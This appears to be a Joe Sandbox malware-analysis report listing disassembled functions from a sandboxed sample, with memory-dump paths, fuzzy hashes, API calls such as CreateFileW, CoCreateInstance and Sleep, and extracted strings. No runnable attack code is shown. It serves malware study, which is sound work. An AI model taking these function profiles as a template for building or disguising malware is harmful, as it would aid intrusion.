Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 331ad40aa3f253e4bd6163554c939955f36f9f411ee98ae329d3521766484f48
Instruction ID: 734b2cd0ce65b6f2efef9f678b90ba6b343c7d5bb09e49eb7ac5591b9fb68f9d
Opcode Fuzzy Hash: 331ad40aa3f253e4bd6163554c939955f36f9f411ee98ae329d3521766484f48
Instruction Fuzzy Hash: 3E90023624140403D51075585C04647104A97D1301F59D411A4424658EC75489A1A221

Uniqueness

Uniqueness Score: -1.00%

Function 01603D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 796358a95fcee17fcc731bef045354403a8a99fd927b8ed484e483b91b2052ce
Instruction ID: a1f0824cc9e9b47efcd99dd3f5e4fcd6be7ccdc40638ca524c247125b93e5ca5
Opcode Fuzzy Hash: 796358a95fcee17fcc731bef045354403a8a99fd927b8ed484e483b91b2052ce
Instruction Fuzzy Hash: 1A90023224240143954076585C04A4F510997E2302B99D415A4015654DCA1489615321

Uniqueness

Uniqueness Score: -1.00%

Function 01602C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: cd7b209780561a80ae83f8247581624f21ba080d7a960183e7c449feaa26e915
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 001C6D0B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001C69C1: CreateFileW.KERNEL32(?,00000000,?,001C6DB4,?,?,00000000,?,001C6DB4,?,0000000C), ref: 001C69DE

GetLastError.KERNEL32 ref: 001C6E1F
__dosmaperr.LIBCMT ref: 001C6E26
GetFileType.KERNEL32(00000000), ref: 001C6E32
GetLastError.KERNEL32 ref: 001C6E3C
__dosmaperr.LIBCMT ref: 001C6E45
CloseHandle.KERNEL32(00000000), ref: 001C6E65
CloseHandle.KERNEL32(001BE51F), ref: 001C6FB2
GetLastError.KERNEL32 ref: 001C6FE4
__dosmaperr.LIBCMT ref: 001C6FEB

Strings

H, xrefs: 001C6F70

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 4da72346ae443ec75766c92104349d08862b96c1276b8aa15f546d6b2dc18308
Instruction ID: 9633f124ea54769ff564c0340860c861f182b8c755d8d5d09d6519315a9ebdce
Opcode Fuzzy Hash: 4da72346ae443ec75766c92104349d08862b96c1276b8aa15f546d6b2dc18308
Instruction Fuzzy Hash: 84A12436A041549FCF1DEF68DCA1FAE3BA1AB26324F18015EF8429F291CB35D852CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01602890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0160293C
___swprintf_l.LIBCMT ref: 0160295E
___swprintf_l.LIBCMT ref: 016029A3
___swprintf_l.LIBCMT ref: 0163A52E

Strings

ffff:, xrefs: 0163A504
:%u.%u.%u.%u, xrefs: 0163A5B8
::%hs%u.%u.%u.%u, xrefs: 0163A527
::ffff:0:%u.%u.%u.%u, xrefs: 0163A54E

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 1fc9efab19de210a3bd2114c3d662ec985a69dc19fb9560155636c723bbd61e0
Instruction ID: 78892f9d84c9ee08aa113fb950b5b2dfa8f5613120964f77b4a5be21954ae8a7
Opcode Fuzzy Hash: 1fc9efab19de210a3bd2114c3d662ec985a69dc19fb9560155636c723bbd61e0
Instruction Fuzzy Hash: E751F4B6A00116AFCB16DBAD8CA497FFBB8BF48240714826DF5A5D7681D334DE4487A0

Uniqueness

Uniqueness Score: -1.00%

Function 01672410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 016724A6
___swprintf_l.LIBCMT ref: 016724E2
___swprintf_l.LIBCMT ref: 0167257D
___swprintf_l.LIBCMT ref: 016725A3
___swprintf_l.LIBCMT ref: 016725C8
___swprintf_l.LIBCMT ref: 01672608

Strings

ffff:, xrefs: 0167247D, 0167249D
::%hs%u.%u.%u.%u, xrefs: 0167249E
:%u.%u.%u.%u, xrefs: 016725FF
::ffff:0:%u.%u.%u.%u, xrefs: 016724DA

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 1a2e261776f3ccaafadd9c6fd8b0544dde50905ccf1e7b76666acae41efd7c55
Instruction ID: 19d2a05e962ab94e9db8c3f64560b5ad084f131b8742a53baa659c10b523b257
Opcode Fuzzy Hash: 1a2e261776f3ccaafadd9c6fd8b0544dde50905ccf1e7b76666acae41efd7c55
Instruction Fuzzy Hash: 7451E475A00646AEDB30DF9CCDA097FBBF9EB44200B04846EF596D7646E774EA408760

Uniqueness

Uniqueness Score: -1.00%

Function 015F7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01634725
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01634655
ExecuteOptions, xrefs: 016346A0
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01634742
CLIENT(ntdll): Processing section info %ws..., xrefs: 01634787
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016346FC
Execute=1, xrefs: 01634713

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: d5ecd3dc4006e7e21c25979e3c83f5154842389004b4547a61cc52c68d42f263
Instruction ID: 0c28b1e9f68216f4f4e55f2fe2613e0e1fa2e074d41d7a6c8e1ec3ee5847201e
Opcode Fuzzy Hash: d5ecd3dc4006e7e21c25979e3c83f5154842389004b4547a61cc52c68d42f263
Instruction Fuzzy Hash: E051F73164021AAAEF21ABA8DC95FAE77B9FF5C304F0400ADD705AF1D1EB709A458F54

Uniqueness

Uniqueness Score: -1.00%

Function 001A1A9F Relevance: 13.7, APIs: 9, Instructions: 160comsleepCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 001A1AB4
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 001A1B03
CoCreateInstance.OLE32(001CA2E0,00000000,00000017,001CA2D0,?), ref: 001A1B1C
#8.MSI(?), ref: 001A1B27
#2.OLEAUT32(00000000,?,?), ref: 001A1B62
#8.MSI(?), ref: 001A1B9A
#2.OLEAUT32(00000000,?,?), ref: 001A1BD5
Sleep.KERNEL32(00000064), ref: 001A1C20
CoUninitialize.OLE32 ref: 001A1C4B

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: CreateInitializeInstanceIos_base_dtorSleepUninitializestd::ios_base::_
String ID:
API String ID: 3204609414-0
Opcode ID: 669ed720f99a6ac319ed7382651b719b88ade67629386f05f6c4cc7dd3f42ddd
Instruction ID: f184d25663381d68ad48b11e1fb41a3230ba730dc155ca10a042dfd5d94488b7
Opcode Fuzzy Hash: 669ed720f99a6ac319ed7382651b719b88ade67629386f05f6c4cc7dd3f42ddd
Instruction Fuzzy Hash: B0514C71204305AFD714EF64D885E6BB7B9FF8A704F400A5CF5468B291DB71E849CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 001C88E1 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,7FFFFFFF,?,001C8BB1,?,?,?,?,?,?,?,?,?,?), ref: 001C8987
__alloca_probe_16.LIBCMT ref: 001C8A42
__alloca_probe_16.LIBCMT ref: 001C8AD1
__freea.LIBCMT ref: 001C8B1C
__freea.LIBCMT ref: 001C8B22
__freea.LIBCMT ref: 001C8B58
__freea.LIBCMT ref: 001C8B5E
__freea.LIBCMT ref: 001C8B6E

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 790e8278454c874c6e1b7b818521280bd0321a3f7d6b48735a15d4f0365b0218
Instruction ID: ad2ffe81e2f9d95336686e06931725e71fbc79929b7499f8ce494d730019cf44
Opcode Fuzzy Hash: 790e8278454c874c6e1b7b818521280bd0321a3f7d6b48735a15d4f0365b0218
Instruction Fuzzy Hash: A971D5B2900205AFDF259EA48CC2FFE77A99FA9714F29005EE805A7281DF35DC4187A1

Uniqueness

Uniqueness Score: -1.00%

Function 001A1961 Relevance: 10.6, APIs: 7, Instructions: 132comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 001A1970
CoCreateInstance.OLE32(001CA2E0,00000000,00000017,001CA2D0,?), ref: 001A1988
#8.MSI(?), ref: 001A1992
#2.OLEAUT32(00000000,?,?), ref: 001A19CB
#8.MSI(?), ref: 001A19FD
#2.OLEAUT32(00000000,?,?), ref: 001A1A36
CoUninitialize.OLE32(?,?,?), ref: 001A1A90

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID:
API String ID: 948891078-0
Opcode ID: b37a03a8125266cc9358b9b714ea8d2c2db3fb5994094a8382a307e4523fb425
Instruction ID: be2216e1e28a6b830731a4fe1d631fd6daf75731b25f79ca04a5eaf67196f2e3
Opcode Fuzzy Hash: b37a03a8125266cc9358b9b714ea8d2c2db3fb5994094a8382a307e4523fb425
Instruction Fuzzy Hash: C341A171A10218EFCF04DFA4D889EAEB7B9FF49304F400558F502AB291CB71A945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001A1E58 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 127COMMON

Download Yara Rule

APIs

Part of subcall function 001AE4D9: __EH_prolog.LIBCMT ref: 001AE4DE

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 001A1FBD
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 001A1FEB

Strings

<c r="A1">, xrefs: 001A1EDA, 001A1EDF, 001A1EE9
Modified Value, xrefs: 001A1F2C, 001A1F3F
</v>, xrefs: 001A1F12, 001A1F19, 001A1F22
<v>, xrefs: 001A1EFA, 001A1EFF, 001A1F08

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_$H_prolog
String ID: </v>$<c r="A1">$<v>$Modified Value
API String ID: 997254673-4044373161
Opcode ID: ea864a15c742e1b69ba63a52fc8888e8fe0bef427e99f0366f3f0d8fc9342e53
Instruction ID: fec37011940da06f0428c5bbc8cafd88763dad5c141426fb38f21cf82540378a
Opcode Fuzzy Hash: ea864a15c742e1b69ba63a52fc8888e8fe0bef427e99f0366f3f0d8fc9342e53
Instruction Fuzzy Hash: CD41C9765083416EC324E734DC86FAFB7E8AF96350F00492CF58A97191EB309D09C792

Uniqueness

Uniqueness Score: -1.00%

Function 001B26EE Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,?,?,?,?,?,?,001D81BC,19930522,00000000,1FFFFFFF), ref: 001B2715
_CallSETranslator.LIBVCRUNTIME ref: 001B2748
_GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 001B2771

Strings

MOC, xrefs: 001B2727
RCC, xrefs: 001B272F
$, xrefs: 001B2705

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: CallCheckEncodePointerRangeTranslatorTrys
String ID: MOC$RCC$$
API String ID: 877623402-3012946005
Opcode ID: 949fa102d6a7b4d938dadf452ca71da23812b5c9fad8425ae9dabb40fadd47c4
Instruction ID: 09494e80c6b68a5067d3dda98230aabd110c5fc975896249ecbd69ad5805b711
Opcode Fuzzy Hash: 949fa102d6a7b4d938dadf452ca71da23812b5c9fad8425ae9dabb40fadd47c4
Instruction Fuzzy Hash: 6C41B932500249AFDF11CF44C885EEEB7AAEF68314F288588FE0467251CB34ED95CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001BCB9C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,BB40E64E,?,001BCCAB,?,?,00000000), ref: 001BCC5D

Strings

ext-ms-, xrefs: 001BCC07
api-ms-, xrefs: 001BCBF3

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 52a8c07adecc82b62b68129d2385687b26cd17e8ecd339a0cde02f9c064b2de7
Instruction ID: db2ad771684fdcb292aaa67875e12770682da75cbc3d3b4da5605eed9bf873be
Opcode Fuzzy Hash: 52a8c07adecc82b62b68129d2385687b26cd17e8ecd339a0cde02f9c064b2de7
Instruction Fuzzy Hash: 00210A32A01214ABC7229B24DD81E9A7F68EF757A4F250125F95EA72D0D730ED01C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 01696940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: c6c262939aa08963ea6222e8b123c256eb86babbdfc474b048a926d7a241c1af
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: AB021771508342AFDB09CF18C990A6FBBEAEFC8704F04892DF9955B264DB31E905CB56

Uniqueness

Uniqueness Score: -1.00%

Function 001C5DAE Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c444a3d583a57202a54c526f8994900f9547a190c59887f7f5fccc61585539
Instruction ID: f78acefc83a9afe0d9b1eb50952129b24de8b835c2eb3f4849f9e1c3e26ea2d3
Opcode Fuzzy Hash: c8c444a3d583a57202a54c526f8994900f9547a190c59887f7f5fccc61585539
Instruction Fuzzy Hash: FAB11474A04249EFDB15DFA8C881FAEBBB6BF69304F14415CF501A7292C774E981CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001B4BF9 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,001B4BF0,001B179B), ref: 001B4C07
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001B4C15
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001B4C2E
SetLastError.KERNEL32(00000000,?,001B4BF0,001B179B), ref: 001B4C80

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: d933c06ca8addbb235059b6ed8b67adc2794404fde46a8f3ec0cd9869c723cbc
Instruction ID: ba16a55b82a9a2abf0a1508212e04ff7c75344c52f7489c720e5b6d35322bcb3
Opcode Fuzzy Hash: d933c06ca8addbb235059b6ed8b67adc2794404fde46a8f3ec0cd9869c723cbc
Instruction Fuzzy Hash: A801DF3220B7155FA725ABB4BCD9AE73F54EF21BB8760833AF524415E2EF214C819181

Uniqueness

Uniqueness Score: -1.00%

Function 001AE199 Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001AE1A6
int.LIBCPMT ref: 001AE1B9

Part of subcall function 001A1385: std::_Lockit::_Lockit.LIBCPMT ref: 001A1396
Part of subcall function 001A1385: std::_Lockit::~_Lockit.LIBCPMT ref: 001A13B0

std::locale::_Getfacet.LIBCPMT ref: 001AE1C2
std::_Facet_Register.LIBCPMT ref: 001AE1F9
std::_Lockit::~_Lockit.LIBCPMT ref: 001AE202
__CxxThrowException@8.LIBVCRUNTIME ref: 001AE22A

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 7144f08d152b9b56cee08389076698ff1f1d36519c41bbe7e5e1342f9d17be28
Instruction ID: 4a8f0e804a7bacdcfb993114f686648b2a1c69d1ba6121702cb4060c7a90c237
Opcode Fuzzy Hash: 7144f08d152b9b56cee08389076698ff1f1d36519c41bbe7e5e1342f9d17be28
Instruction Fuzzy Hash: CD11C43A90012CABCF04EFD4D9459EE7BF9AF65724F11015AE905A7291DF709E05CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 001ADEAE Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001ADEBB
int.LIBCPMT ref: 001ADECE

Part of subcall function 001A1385: std::_Lockit::_Lockit.LIBCPMT ref: 001A1396
Part of subcall function 001A1385: std::_Lockit::~_Lockit.LIBCPMT ref: 001A13B0

std::locale::_Getfacet.LIBCPMT ref: 001ADED7
std::_Facet_Register.LIBCPMT ref: 001ADF0E
std::_Lockit::~_Lockit.LIBCPMT ref: 001ADF17
__CxxThrowException@8.LIBVCRUNTIME ref: 001ADF3F

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: ba717c2975f2b6350b19acad1dc2333e75dbe73a45509afaf958305c57a403ae
Instruction ID: 3bef55255a0badb284da0e689091e42786a6a05b5f2b8ad861d6c4ab2ee67679
Opcode Fuzzy Hash: ba717c2975f2b6350b19acad1dc2333e75dbe73a45509afaf958305c57a403ae
Instruction Fuzzy Hash: 5311043A900518ABCF04EFE8D8059AEB7B8AF66724F11415AF906A7291DF709E05CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0160B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0160B6BF

Strings

-, xrefs: 0160B650
0, xrefs: 0160B66F
+, xrefs: 0160B65A
0, xrefs: 0160B695

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 6238aad269eba90c1cb2ea1ebc0299c7e00ed9105bb6676cf9af84b8aee99c51
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: BC81AE38A152598EEF2F8E6CCC517BFBBA2AF45320F18C559D861A73D1C73089418B55

Uniqueness

Uniqueness Score: -1.00%

Function 016720E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0167214F
___swprintf_l.LIBCMT ref: 01672172

Strings

[, xrefs: 0167212B
]:%u, xrefs: 01672169
%%%u, xrefs: 01672146

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

